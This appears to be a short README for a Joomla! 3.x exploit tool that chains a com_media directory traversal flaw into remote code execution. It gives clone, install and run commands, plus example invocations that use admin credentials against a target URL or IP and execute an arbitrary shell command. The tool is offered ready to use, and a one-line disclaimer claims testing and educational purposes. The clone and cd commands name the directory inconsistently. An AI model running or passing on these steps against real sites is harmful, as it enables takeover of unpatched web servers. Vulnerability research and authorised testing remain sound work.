com_media allowed paths that are not intended for image uploads to RCE.
A vulnerability, which was classified as critical, has been found in Joomla! 3.0.0 through 3.9.24 (Content Management System). This issue affects an unknown function of the component com_media. The manipulation with an unknown input leads to a directory traversal vulnerability.
This script is PoC to able to use Directory Traversal or Remote Code Execution (RCE) mode.
Directory Traversal to trigger RCE.
git clone https://github.com/CyberCommands/CVE2021-23123.git
cd CVE-2021-23123/
pip install -r requirements.txt
python3 joomla_rce.py --help
For Example:
python3 joomla_rce.py -l http://target.com -u admin -p 1234 -rce 1 -cmd ls
or
python3 joomla_rce.py -l http://192.168.77.100 -u admin -p 1234 -rce 1 -cmd ls
This tool is only for testing and educational purposes only and can be used where strict consent has been given. I am not responsible for any misuse or damage caused by this tool.